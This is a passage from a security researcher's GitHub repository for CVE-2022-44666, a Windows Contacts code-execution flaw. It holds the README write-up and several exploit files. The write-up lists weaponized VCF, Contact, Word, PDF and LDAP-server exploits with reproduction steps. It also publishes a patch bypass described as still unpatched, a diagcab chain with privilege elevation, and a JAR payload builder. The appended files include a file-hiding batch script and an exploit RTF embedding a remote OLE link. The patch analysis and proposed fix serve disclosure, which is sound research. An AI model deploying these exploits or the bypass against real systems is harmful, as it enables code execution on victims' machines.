![alt text](<./videos/pdfreaders-poc.gif>) 320 | 321 | - 6.6. Exploit for PDF Readers: [./videos/pdfreaders-exploit.gif](./videos/pdfreaders-exploit.gif). 322 | 323 | ![alt text](<./videos/pdfreaders-exploit.gif>) 324 | 325 | Additionally, these are all the files for further exploitation: 326 | 327 | + [./further-pocs/browsers/poc/KB5014666-hotfix.vcf](./further-pocs/browsers/poc/KB5014666-hotfix.vcf): Simple payload which executes local binaries. 328 | + [./further-pocs/browsers/poc/poc.html](./further-pocs/browsers/poc/poc.html): HTML file to download KB5014666-hotfix.vcf. 329 | + [./further-pocs/browsers/remote-weaponized-by-searchms/exploit.html](./further-pocs/browsers/remote-weaponized-by-searchms/exploit.html): HTML file to trigger "search-ms" in a remote shared location. 330 | + [./further-pocs/MSWord/poc/KB5014666-hotfix.vcf](./further-pocs/MSWord/poc/KB5014666-hotfix.vcf): Simple payload which executes local binaries. 331 | + [./further-pocs/MSWord/poc/poc.docx](./further-pocs/MSWord/poc/poc.docx): Word file in format DOCX which triggers a remote template aka htmlfile activex. 332 | + [./further-pocs/MSWord/poc/poc.rtf](./further-pocs/MSWord/poc/poc.rtf): Word file in format RTF which triggers a remote template aka htmlfile activex. 333 | + [./further-pocs/MSWord/poc/poc.html](./further-pocs/MSWord/poc/poc.html): remote template aka htmlfile activex. 334 | + [./further-pocs/MSWord/remote-weaponized-by-searchms/exploit.docx](./further-pocs/MSWord/remote-weaponized-by-searchms/exploit.docx): Word file in format DOCX which triggers a remote template aka htmlfile activex. 335 | + [./further-pocs/MSWord/remote-weaponized-by-searchms/exploit.rtf](./further-pocs/MSWord/remote-weaponized-by-searchms/exploit.rtf): Word file in format RTF which triggers a remote template aka htmlfile activex. 336 | + [./further-pocs/MSWord/remote-weaponized-by-searchms/poc.html](./further-pocs/MSWord/remote-weaponized-by-searchms/poc.html): Remote template aka htmlfile activex which triggers "search-ms" in a remote shared location. 337 | + [./further-pocs/PDFreaders/poc/KB5014666-hotfix.vcf](./further-pocs/PDFreaders/poc/KB5014666-hotfix.vcf): Simple payload which executes local binaries. 338 | + [./further-pocs/PDFreaders/poc/poc-vcf.pdf](./further-pocs/PDFreaders/poc/poc-vcf.pdf): PDF file which triggers default browser to download and execute KB5014666-hotfix.vcf. 339 | + [./further-pocs/PDFreaders/remote-weaponized-by-searchms/exploit.html](./further-pocs/PDFreaders/remote-weaponized-by-searchms/exploit.html): HTML file which triggers "search-ms" in a remote shared location to be used by PDF Readers. 340 | + [./further-pocs/PDFreaders/remote-weaponized-by-searchms/exploit.pdf](./further-pocs/PDFreaders/remote-weaponized-by-searchms/exploit.pdf): PDF which triggers defaul browser to execute uri protocol "search-ms". 341 | 342 | 343 | ## Contact Files 344 | 345 | After receiving ***Update 2022/07/21*** from MSRC's, i decided to take a look into Contact file extension as it would confirm whether or not it's the same case as that found by the original discoverer, and of course it is. My first proof of concept was just using a different file format, but the bug is the same. Just using wabmig.exe located in "C:\Program Files\Windows Mail" is possible to convert all the VCF files to Contact files. 346 | 347 | ![alt text](<./images/convert-vcf-to-contact-wabmig.png>) 348 | 349 | And as mentioned in the intro updates, these files are opened by Windows Contacts (default program). 350 | 351 | The steps to reproduce are the same than those used for VCF files. Same restrictions observed on VCF files are applied with Contact files, that is, it's not possible to use remote shared locations for the attribute "href" but it's still possible to use local paths or url protocol "search-ms". 352 | 353 | These are all the files added or modified to exploit Contact files: 354 | 355 | + [./further-pocs/browsers/poc/KB5014666-hotfix.vcf](./further-pocs/browsers/poc/KB5014666-hotfix.vcf): Simple payload which executes local binaries using VCF format. 356 | + [./further-pocs/browsers/poc/KB5014666-hotfix.contact](./further-pocs/browsers/poc/KB5014666-hotfix.contact): Simple payload which executes local binaries using Contact format. 357 | + [./further-pocs/browsers/poc/poc-vcf.html](./further-pocs/browsers/poc/poc-vcf.html): HTML file to download KB5014666-hotfix.vcf. 358 | + [./further-pocs/browsers/poc/poc-contact.html](./further-pocs/browsers/poc/poc-contact.html): HTML file to download KB5014666-hotfix.contact. 359 | + [./further-pocs/MSWord/poc/KB5014666-hotfix.vcf](./further-pocs/MSWord/poc/KB5014666-hotfix.vcf): Simple payload which executes local binaries using VCF format. 360 | + [./further-pocs/MSWord/poc/KB5014666-hotfix.contact](./further-pocs/MSWord/poc/KB5014666-hotfix.contact): Simple payload which executes local binaries using Contact format. 361 | + [./further-pocs/PDFreaders/poc/KB5014666-hotfix.contact](./further-pocs/PDFreaders/poc/KKB5014666-hotfix.contact): Simple payload which executes local binaries using Contact format. 362 | + [./further-pocs/PDFreaders/poc/poc-contact.pdf](./further-pocs/PDFreaders/poc/poc-contact.pdf): PDF file to download KB5014666-hotfix.contact. 363 | + [./further-pocs/to-copy-in-remote-shared-location/KB5001337-hotfix.contact](./further-pocs/to-copy-in-remote-shared-location/KB5001337-hotfix.contact): Payload which executes binaries by "search-ms" in a remote shared location using Contact format. 364 | + [./report-pocs/exploit.contact](./report-pocs/exploit.contact): Same file than exploit.VCF in Contact file format. 365 | 366 | 367 | ## URL protocol LDAP 368 | 369 | As mentioned above, this further research made me to reach a point that i was trying to reach some time ago: Use some URL protocol handler to automatically open crafted contact data to exploit the bug. This challenge was finally achieved thanks to ldap uri scheme. 370 | 371 | 372 | ```js 373 | ... 374 | Windows Registry Editor Version 5.00 375 | 376 | [HKEY_CLASSES_ROOT\LDAP] 377 | @="URL:LDAP Protocol" 378 | "EditFlags"=hex:02,00,00,00 379 | "URL Protocol"="" 380 | 381 | [HKEY_CLASSES_ROOT\LDAP\Clsid] 382 | @="{228D9A81-C302-11cf-9AA4-00AA004A5691}" 383 | 384 | [HKEY_CLASSES_ROOT\LDAP\shell] 385 | 386 | [HKEY_CLASSES_ROOT\LDAP\shell\open] 387 | 388 | [HKEY_CLASSES_ROOT\LDAP\shell\open\command] 389 | @=hex(2):22,00,25,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,46,00,69,00,6c,\ 390 | 00,65,00,73,00,25,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,73,00,20,00,\ 391 | 4d,00,61,00,69,00,6c,00,5c,00,77,00,61,00,62,00,2e,00,65,00,78,00,65,00,22,\ 392 | 00,20,00,22,00,2f,00,6c,00,64,00,61,00,70,00,3a,00,25,00,31,00,22,00,00,00 393 | ... 394 | ``` 395 | 396 | That is: 397 | 398 | ``` 399 | "%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1" 400 | ``` 401 | 402 | So just setting a rogue LDAP server up and serving the payload data, it's possible to use this url protocol handler to launch Windows Contacts (wab.exe) with a malicious payload in the ldif attributes mail, url or wwwhomepage. Note that i was unable to do this working on the attribute "wwwhomepage" as indicated [here][R.8], but it should theorically work. 403 | 404 | The crafted ldif content is just something like this: 405 | 406 | 407 | ```html 408 | ... 409 | dn: dc=org 410 | dc: org 411 | objectClass: dcObject 412 | 413 | dn: dc=example,dc=org 414 | dc: example 415 | objectClass: dcObject 416 | objectClass: organization 417 | 418 | dn: ou=people,dc=example,dc=org 419 | objectClass: organizationalUnit 420 | ou: people 421 | 422 | dn: cn=Microsoft,ou=people,dc=example,dc=org 423 | cn: Microsoft 424 | gn: Microsoft 425 | company: Microsoft 426 | title: Microsoft KB5001337-hotfix 427 | mail:">Run-installer... 428 | url:">Run-installer... 429 | wwwhomepage:">Run-installer... 430 | objectclass: top 431 | objectclass: person 432 | objectClass: inetOrgPerson 433 | ... 434 | ``` 435 | 436 | And the code for the rogue ldap server was taken borrowed from the quick start server of ldaptor project, located [over here][R.9]. 437 | 438 | This is a summary of target applications: 439 | 440 | * Browsers: MS Edge, Google Chrome, Mozilla Firefox & Opera. 441 | * MS Word. 442 | * PDF Readers (mainly Adobe Acrobat Reader DC & Foxit PDF Reader). 443 | 444 | The steps to reproduce are: 445 | 446 | 1. Copy [./further-pocs](./further-pocs) into remote shared location (SMB or WebDav). 447 | 2. If wanted, hide the files running [./further-pocs/MSWord/setup-hidden.bat](./further-pocs/MSWord/setup-hidden.bat). 448 | 3. Install ldaptor by pip: pip install ldaptor. Note this has been tested on Python 2.7 x64. 449 | 4. Start rogue ldap server located in [./further-pocs/ldap-rogue-server/ldap-server.py](./further-pocs/ldap-rogue-server/ldap-server.py) 450 | 5. Start a webserver in the target app path, that is: ./further-pocs/[vector or target app]/url-protocol-ldap/. 451 | 6. Run exploit files depending on the case. 452 | 7. For further info, watch the videos located in [./videos](./videos): 453 | - 7.1. For browsers: [./videos/ldap-browsers-exploit.gif](./videos/ldap-browsers-exploit.gif). 454 | 455 | ![alt text](<./videos/ldap-browsers-exploit.gif>) 456 | 457 | - 7.2. For MS Word: [./videos/ldap-msword-exploit.gif](./videos/ldap-msword-exploit.gif). 458 | 459 | ![alt text](<./videos/ldap-msword-exploit.gif>) 460 | 461 | - 7.3. For PDF Readers: [./videos/ldap-pdfreaders-exploit.gif](./videos/ldap-pdfreaders-exploit.gif). 462 | 463 | ![alt text](<./videos/ldap-pdfreaders-exploit.gif>) 464 | 465 | These are the additional files to exploit url protocol ldap: 466 | 467 | + [./further-pocs/browsers/url-protocol-ldap/exploit.html](./further-pocs/browsers/url-protocol-ldap/exploit.html): HTML file to load url protocol ldap on a rogue ldap server which returns crafted data for mail and urls. 468 | + [./further-pocs/MSWord/url-protocol-ldap/poc.html](./further-pocs/MSWord/url-protocol-ldap/poc.html): remote template aka htmlfile activex to load url protocol ldap on a rogue ldap server which returns crafted data for mail and urls. 469 | + [./further-pocs/MSWord/url-protocol-ldap/exploit.rtf](./further-pocs/MSWord/url-protocol-ldap/exploit.rtf): Word file in format RTF which triggers a remote template aka htmlfile activex. 470 | + [./further-pocs/MSWord/url-protocol-ldap/exploit.docx](./further-pocs/MSWord/url-protocol-ldap/exploit.docx): Word file in format DOCX which triggers a remote template aka htmlfile activex. 471 | + [./further-pocs/PDFreaders/url-protocol-ldap/exploit.html](./further-pocs/PDFreaders/url-protocol-ldap/exploit.html): HTML file to load url protocol ldap on a rogue ldap server which returns crafted data for mail and urls. 472 | + [./further-pocs/PDFreaders/url-protocol-ldap/exploit.pdf](./further-pocs/PDFreaders/url-protocol-ldap/exploit.pdf): PDF which triggers defaul browser to execute uri protocol "ldap". 473 | + [./further-pocs/ldap-rogue-server/ldap-server.py](./further-pocs/ldap-rogue-server/ldap-server.py): Python script based on the server sample for ldaptor, which runs on Python 2.7, and serves the crafted data to exploit the bug through the ldif attributes mail, url and wwwhomepage. 474 | 475 | ## CVE-2022-44666: Patch analysis and incomplete fix 476 | 477 | On Dec 13, 2022 the patch for this vulnerability was released by Microsoft as [CVE-2022-44666][R.10]. 478 | 479 | The versions used for diffing the patch (located in C:\Program Files\Common Files\System\wab32.dll) have been: 480 | 481 | + MD5: 588A3D68F89ABF1884BEB7267F274A8B (pre-patch) 482 | + MD5: D1708215AD2624E666AFD97D97720E81 (post-patch) 483 | 484 | Diffing the affected library (wab32.dll) with [Diaphora][R.11] by [@matalaz][R.12], we'll find out some new functions: 485 | 486 | ![alt text](<./bypass/images/unmatched-diaphora-wab32dll.png>) 487 | 488 | And these are the partial matches: 489 | 490 | ![alt text](<./bypass/images/partialmatches-diaphora-wab32dll.png>) 491 | 492 | Taking a look into the new code in function "fnSummaryProc": 493 | 494 | ```cpp 495 | __int64 __fastcall fnSummaryProc(HWND a1, int a2, WPARAM a3, LONG_PTR a4) 496 | { 497 | 498 | ... 499 | 500 | if ( v26 <= 0x824 && (!v23 ? (v27 = 0) : (v27 = IsValidWebsiteUrlScheme(v23)), v27) ) // (1) 501 | { 502 | v38 = (unsigned __int16 *)2085; 503 | v39 = &CPercentEncodeRFC3986::`vftable'; 504 | v40 = v23; 505 | v41 = v26; 506 | v28 = CPercentEncodeString::Encode( 507 | (CPercentEncodeString *)&v39, 508 | (unsigned __int16 *)&Dst, 509 | (unsigned __int64 *)&v38, 510 | v25); 511 | v29 = v7; 512 | if ( !v28 ) 513 | { 514 | v30 = (const unsigned __int16 *)&Dst; 515 | LABEL_44: 516 | SafeExecute(v29, v24, v30); // (2) 517 | return 1i64; 518 | } 519 | } 520 | else 521 | { 522 | if ( v23 ) 523 | v32 = IsInternetAddress(v23, &v38); 524 | else 525 | v32 = 0; 526 | v29 = v7; 527 | if ( v32 ) 528 | { 529 | v30 = v23; 530 | goto LABEL_44; // (3) 531 | } 532 | } 533 | v31 = GetParent(v29); 534 | ShowMessageBox(v31, 0xFE1u, 0x30u); // (4) 535 | return 1i64; 536 | } 537 | ... 538 | } 539 | ``` 540 | After the fix, the new code calls to the function "SafeExecute" (2) or show a message box (4). 541 | 542 | ![alt text](<./bypass/images/show-messagebox-wabexe.png>) 543 | 544 | To reach the call of the funcion "SafeExecute" (2) is possible to follow the code flow in (1): 545 | 546 | ```cpp 547 | _BOOL8 __fastcall IsValidWebsiteUrlScheme(LPCWSTR pszIn) 548 | { 549 | const WCHAR *v1; // rbx 550 | _BOOL8 result; // rax 551 | DWORD pcchOut; // [rsp+30h] [rbp-68h] 552 | char Dst; // [rsp+40h] [rbp-58h] 553 | 554 | v1 = pszIn; 555 | result = 0; 556 | if ( UrlIsW(pszIn, URLIS_URL) ) // (5) 557 | { 558 | memset_0(&Dst, 0, 0x40ui64); 559 | pcchOut = 32; 560 | if ( UrlGetPartW(v1, (LPWSTR)&Dst, &pcchOut, 1u, 0) >= 0 561 | && (!(unsigned int)StrCmpICW(&Dst, L"http") || !(unsigned int)StrCmpICW(&Dst, L"https")) ) // (6) 562 | { 563 | result = 1; 564 | } 565 | } 566 | return result; 567 | } 568 | ``` 569 | 570 | This function first checks if the [URL is valid in (5)][R.13], then, it checks whether or not it starts with "http" or "https" in (6). This code path looks safe enough. Coming back to the function "fnSummaryProc", there's another code path that could help to bypass the fix in (3). 571 | 572 | ```cpp 573 | __int64 __fastcall IsInternetAddress(unsigned __int16 *a1, unsigned __int16 **a2) 574 | { 575 | unsigned __int16 v2; // ax 576 | unsigned __int16 **v3; // r14 577 | unsigned __int16 *v4; // rdi 578 | unsigned __int16 *v5; // r15 579 | unsigned __int16 v6; // dx 580 | unsigned __int16 *v7; // r8 581 | unsigned __int16 *v8; // rcx 582 | WCHAR v9; // ax 583 | _WORD *v10; // rsi 584 | int v11; // ebp 585 | LPWSTR v12; // rax 586 | unsigned __int16 *v14; // rax 587 | 588 | v2 = *a1; 589 | v3 = a2; 590 | v4 = a1; 591 | v5 = a1; 592 | while ( v2 && v2 != 0x3C ) 593 | { 594 | a1 = CharNextW(a1); 595 | v2 = *a1; 596 | } 597 | v6 = *a1; 598 | v7 = a1; 599 | if ( *a1 ) 600 | { 601 | v8 = a1 + 1; 602 | v4 = v8; 603 | } 604 | else 605 | { 606 | v8 = v4; 607 | } 608 | v9 = *v8; 609 | v10 = (_WORD *)((unsigned __int64)v7 & -(__int64)(v6 != 0)); 610 | v11 = v6 != 0; 611 | if ( *v8 & 0xFFBF ) 612 | { 613 | while ( v9 <= 0x7Fu && v9 != 0xD && v9 != 0xA ) 614 | { 615 | if ( v9 == 0x40 ) // (7) 616 | { 617 | v14 = CharNextW(v8); 618 | if ( !(unsigned int)IsDomainName(v14, v11, v3 != 0i64) ) // (8) 619 | return 0i64; 620 | if ( v3 ) 621 | { 622 | if ( v10 ) 623 | { 624 | *v10 = 0; 625 | TrimSpaces(v5); 626 | } 627 | *v3 = v4; 628 | } 629 | return 1i64; 630 | } 631 | v12 = CharNextW(v8); 632 | v8 = v12; 633 | v9 = *v12; 634 | if ( !v9 ) 635 | return 0i64; 636 | } 637 | } 638 | return 0i64; 639 | } 640 | ``` 641 | 642 | One thing caught my attention about this in (7), where the code is checking whether it exists a char "@". Then, it calls to the function "IsDomainName" in order to check whether or not the string after the char "@" is a domain name: 643 | 644 | ```cpp 645 | __int64 __fastcall IsDomainName(unsigned __int16 *a1, int a2, int a3) 646 | { 647 | int v3; // edi 648 | int v4; // ebx 649 | int v5; // er9 650 | __int64 v6; // rdx 651 | 652 | v3 = a3; 653 | v4 = a2; 654 | if ( !a1 ) 655 | return 0i64; 656 | LABEL_2: 657 | v5 = *a1; 658 | if ( !(_WORD)v5 || (_WORD)v5 == 0x2E || v4 && (_WORD)v5 == 0x3E ) 659 | return 0i64; 660 | while ( (_WORD)v5 && (!v4 || (_WORD)v5 != 0x3E) ) 661 | { 662 | if ( (unsigned __int16)v5 >= 0x80u ) 663 | return 0i64; 664 | if ( (unsigned __int16)(v5 - 10) <= 0x36u ) 665 | { 666 | v6 = 19140298416324617i64; 667 | if ( _bittest64(&v6, (unsigned int)(v5 - 10)) ) 668 | return 0i64; 669 | } 670 | if ( (_WORD)v5 == 46 ) 671 | { 672 | a1 = CharNextW(a1); 673 | if ( a1 ) 674 | goto LABEL_2; 675 | return 0i64; 676 | } 677 | a1 = CharNextW(a1); 678 | v5 = *a1; 679 | } 680 | if ( v4 ) 681 | { 682 | if ( (_WORD)v5 != 0x3E ) 683 | return 0i64; 684 | if ( v3 ) 685 | *a1 = 0; 686 | } 687 | return 1i64; 688 | } 689 | ``` 690 | 691 | So the bypass for the fix is pretty simple. It's just necessary to use a single char "@". Symlink href attributes like these will successfully bypass the fix: 692 | 693 | ```html 694 | hidden\@payload.lnk 695 | hidden\@payload.exe 696 | ``` 697 | 698 | ```html 699 | hidden@payload.lnk 700 | hidden@payload.exe 701 | ``` 702 | 703 | For further info, there's a video for a [standalone contact file](./bypass/videos/simple-payload.gif). 704 | 705 | ![alt text](<./bypass/videos/simple-payload.gif>) 706 | 707 | Proof of concept located in [./bypass/report-pocs](./bypass/report-pocs). 708 | 709 | And another one for [MS Word and LDAP url protocol](./bypass/videos/ldap-msword-exploit.gif). 710 | 711 | ![alt text](<./bypass/videos/ldap-msword-exploit.gif>) 712 | 713 | Proof of concept located in [./bypass/further-pocs](./bypass/further-pocs). 714 | 715 | One day later the patch release, this information was sent to MSRC. Unfortunately, the case has been recently closed with no further info about it. 716 | 717 | ![alt text](<./bypass/images/msrc-reply-case-closed.png>) 718 | 719 | ## Diagcab file as payload 720 | 721 | After [CVE-2022-30190][R.14] also known as [Follina vulnerability][R.15] and [CVE-2022-34713][R.16] also known as [DogWalk vulnerability][R.17], a [publicly known but underrated technique][R.18] was reborn again thanks to [@buffaloverflow][R.19]. My mate and friend [Eduardo Braun Prado][R.20] gave me the idea to use this technique over here. 722 | 723 | There are some pre-requirements to do this: 724 | 725 | 1. The target user has to belong to administrator group. If not, there's a UAC prompt. 726 | 2. The diagcab file has to be signed, so the codesigning certificate must have been installed in the target computer. 727 | 728 | A real attack scenario would pass for stealing a code signing certificate which is in fact installed in the target system. But as this is just a proof of concept, a self-signed code signing certificate was generated and used to sign the diagcab file named as [@payload.diagcab](./bypass/diagcab-pocs/MSWord/hidden/@payload.diagcab). 729 | 730 | So in order to repro, it's needed to install the certificate located in [cert.cer](./bypass/diagcab-pocs/cert.cer) under Trusted Root Certificate Authority [like this](./bypass/videos/install-certificate.gif): 731 | 732 | ![alt text](<./bypass/videos/install-certificate.gif>) 733 | 734 | To finally elevate the priveleges, a token stealing/impersonation could be used. In this case, ["parent process" technique][R.21] was the [chosen one][R.22]. A modified version for this script was included inside the resolver scripts. 735 | 736 | For further info, there's a video for [MS Word and LDAP url protocol](./bypass/videos/ldap-msword-diagcab-exploit.gif). 737 | 738 | ![alt text](<./bypass/videos/ldap-msword-diagcab-exploit.gif>) 739 | 740 | Proof of concept located in [./bypass/diagcab-pocs](./bypass/diagcab-pocs). 741 | 742 | ## JAR files as payload 743 | 744 | ***Update 2023/06/19:*** After reading [@pfiatde][R.24]'s [post on "ZipJar"][R.25], this interesting information makes JAR files a good candidate to be used as payload in this vulnerability, which by the way it is still 0day nowadays, as the MotW gets ignored, doesn't require accepting any prompt. 745 | 746 | JAR payload was taken from github repository [calc_security_poc][R.26]. 747 | 748 | There you go attached a little builder, [create-poc.py](./bypass/jar-poc) to make your own POC from some template. 749 | 750 | ![alt text](<./bypass/videos/jar-exploit.gif>) 751 | 752 | Don't forget give the thanks to [@microlovu][R.27] and [@mlftsecresponse][R.28]. 😂 753 | 754 | ## Proposed fix 755 | 756 | Remember the vulnerable code in the function "fnSummaryProc": 757 | 758 | ```cpp 759 | ... 760 | LABEL_44: 761 | SafeExecute(v29, v24, v30); // Vulnerable call to shellexecute 762 | return 1i64; 763 | } 764 | } 765 | else 766 | { 767 | if ( v23 ) 768 | v32 = IsInternetAddress(v23, &v38); // Bypass with a single "@" 769 | else 770 | v32 = 0; 771 | v29 = v7; 772 | if ( v32 ) 773 | { 774 | v30 = v23; 775 | goto LABEL_44; 776 | } 777 | } 778 | ... 779 | ``` 780 | 781 | The function "IsInternetAddress" was intentionally created to check if the href attr corresponds to any email address. So my proposed fix (and following the imported functions that the library uses) would be: 782 | 783 | ```cpp 784 | ... 785 | if (v32 && !(unsigned int)StrCmpNICW(L"mailto:", v23, 7i64)) // Check out the href really starts with "mailto:" 786 | { 787 | v30 = v23; 788 | goto LABEL_44; 789 | } 790 | ... 791 | ``` 792 | 793 | So simple like this, it's only needed to check this out before calling to "SafeExecute". Just testing if the target string (v23) starts with "mailto:", the bug would be fully fixed IMHO. 794 | 795 | ## Unofficial fix 796 | 797 | Some days/weeks ago when i contacted [@mkolsek][R.30] of [0patch][R.23] to inform him about this issue, who by the way is always very kind to me, told me this has been receiving [an unofficial fix for Windows 7 since then][R.29] (4 years ago). That was a surprise and good news! 798 | 799 | It was tested and successfully stopped the new variant of CVE-2022-44666. The micropatch prepends "http://" to the attacker-controlled string passed by the href attr if doesn't start with "mailto:", "http://" or "https://", which is enough to fully fix the issue. Now it's going to be extended for the latest Windows versions, only necessary to update some offsets. 800 | 801 | ![alt text](<./videos/micropatch-0patch.gif>) 802 | 803 | Either way, it would be better to get an official patch. 804 | 805 | ## Acknowledgments 806 | 807 | + [@hyp3rlinx][R.1]: Special shout out and acknowledgement because he began this research some years ago and his work was essential for this writeup. ~~He should have been also credited for finding this out but unfortunately i was unable to contact him just in time~~. It's already been done (***Update 2023/02/08***). 808 | + [@Edu_Braun_0day][R.20]: who also worked around [this issue][R.31]. 809 | + [@mkolsek][R.30]. 810 | + [@matalaz][R.12]. 811 | + [@buffaloverflow][R.19]. 812 | + [@msftsecresponse][R.2]. 813 | + ... 814 | 815 | 816 | By [@j00sean](https://twitter.com/j00sean) 817 | 818 | [R.1]: "@hyp3rlinx" 819 | [R.2]: "@msftsecresponse" 820 | [R.3]: "@thezdi" 821 | [R.4]: "John Page (aka hyp3rlinx)'s exploit fully disclosed more than 4 years ago" 822 | [R.5]: "ZDI-19-121" 823 | [R.6]: "MS Documentation about syslink controls" 824 | [R.7]: "CVE-2022-34478: search-ms disabling for Mozilla Firefox" 825 | [R.8]: "LDIF attributes and associated fields documentation" 826 | [R.9]: "ldaptor server quick start" 827 | [R.10]: "CVE-2022-44666" 828 | [R.11]: "Diaphora" 829 | [R.12]: "@matalaz" 830 | [R.13]: "UrlIsW function" 831 | [R.14]: "CVE-2022-30190" 832 | [R.15]: "Follina vulnerability" 833 | [R.16]: "CVE-2022-34713" 834 | [R.17]: "DogWalk vulnerability" 835 | [R.18]: "Diagcab files" 836 | [R.19]: "@buffaloverflow" 837 | [R.20]: "@Edu_Braun_0day" 838 | [R.21]: "Parent process technique" 839 | [R.22]: "Getsystem via parent process" 840 | [R.23]: "0patch" 841 | [R.24]: "@pfiatde" 842 | [R.25]: "ZipJar, a little bit unexpected attack chain" 843 | [R.26]: "calc_security_poc" 844 | [R.27]: "@microlovu" 845 | [R.28]: "@mlftsecresponse" 846 | [R.29]: "Micropatch released 4 years ago" 847 | [R.30]: "@mkolsek" 848 | [R.31]: "Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution" 849 | -------------------------------------------------------------------------------- /bypass/diagcab-pocs/MSWord/hidden/@payload.diagcab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/diagcab-pocs/MSWord/hidden/@payload.diagcab -------------------------------------------------------------------------------- /bypass/diagcab-pocs/MSWord/setup-hidden.bat: -------------------------------------------------------------------------------- 1 | attrib +s +h +r hidden\@payload.diagcab 2 | attrib +s +h +r hidden 3 | -------------------------------------------------------------------------------- /bypass/diagcab-pocs/MSWord/url-protocol-ldap/exploit.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/diagcab-pocs/MSWord/url-protocol-ldap/exploit.docx -------------------------------------------------------------------------------- /bypass/diagcab-pocs/MSWord/url-protocol-ldap/exploit.rtf: -------------------------------------------------------------------------------- 1 | {\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0{ 2 | {\object\objautlink\rsltpict\objw1440\objh1439{\*\objclass http://127.0.0.1:8081/poc.html}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 0105000002000000090000004f4c45324c696e6b 3 | 000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000 4 | feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 5 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 6 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 7 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 8 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 9 | fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffff 10 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 11 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 12 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 13 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 14 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 15 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400 16 | 72007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e500 17 | 000000000000000000000040e84f40667fd80103000000c00200000000000001004f006c006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000 18 | 00000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000800100000000000003004f 19 | 0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000 20 | 000000000000000000000000000000000000000000000000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f0000000000000000000000000000000000000000 21 | 00000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000700 22 | 000040010000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 23 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 24 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 25 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 26 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 27 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 28 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000020000c0000 29 | 005f3137313534393137353500000000009d0000000903000000000000c00000000000004602000000e0c9ea79f9bace118c8200aa004ba90b5600000068007400740070003a002f002f003100320037002e0030002e0030002e0031003a0038003000380031002f0070006f0063002e00680074006d006c000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c00000 30 | 